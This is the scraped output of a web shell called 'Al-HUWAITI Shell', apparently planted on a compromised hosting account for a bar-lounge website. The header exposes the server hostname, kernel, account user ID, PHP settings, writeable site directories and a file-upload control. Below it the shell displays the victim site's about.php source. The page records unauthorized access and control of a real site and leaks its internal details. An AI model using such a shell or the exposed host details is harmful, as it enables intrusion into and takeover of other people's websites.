Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/bottlesrepublik.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/bottlesrepublik.com/public_html/about.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); ?>
<?php include("header.php"); ?>
<title><?php echo $company_name; ?> - About</title>
    <!-- ***** Breadcumb Area Start ***** -->
    <div class="breadcumb-area bg-img bg-overlay" style="background-image: url(img/bg-img/hero-5.jpg)">
        <div class="container h-100">
            <div class="row h-100 align-items-center">
                <div class="col-12">
                    <div class="breadcumb-content">
                        <h2>About us</h2>
                        <p>What we stand for</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- ***** Breadcumb Area End ***** -->

     <!-- ****** About Us Area Start ****** -->
     <section class="caviar-about-us-area section-padding-150" id="about">
        <div class="container">
            <!-- About Us Single Area -->
            
            <!-- About Us Single Area -->
            <div class="about-us-second-part">
                <div class="row align-items-center pt-200">
                    <div class="col-12 col-md-6 col-lg-5">
                        <div class="about-us-content">
                            <span>Why Choose Us</span>
                            <p>Welcome to <?php echo $company_name; ?>: Where Every Sip Tells a Story and Every Beat Sets the Tone.
<br><br>
Step into a realm where cocktails are crafted with passion and conversations flow like the smoothest melodies. Nestled in the heart of the city, Oasis Lounge beckons you with its chic ambiance and vibrant energy.
<br><br>
Whether you're unwinding after a long day or igniting the night with friends, our expert mixologists will concoct the perfect potion to tantalize your taste buds. From classic concoctions to innovative libations, each sip is a journey through flavor.
<br><br>
Indulge in our curated selection of small plates and appetizers, designed to complement your drink of choice and elevate your experience. From savory bites to decadent treats, our menu promises to satisfy every craving.
<br><br>
And as the evening unfolds, let the rhythm of the music guide you into the night. With live DJs spinning tunes that span genres and eras, every beat is an invitation to dance, laugh, and create unforgettable memories.</p>
                        </div>
                    </div>
                    <div class="col-12 col-md-6 ml-md-auto">
                        <div class="about-us-thumbnail wow fadeInUp" data-wow-delay="0.5s">
                            <img src="img/bg-img/about-2.jpg" alt="">
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!-- ****** About Us Area End ****** -->
<?php include("footer.php"); ?>

Al-HUWAITI Shell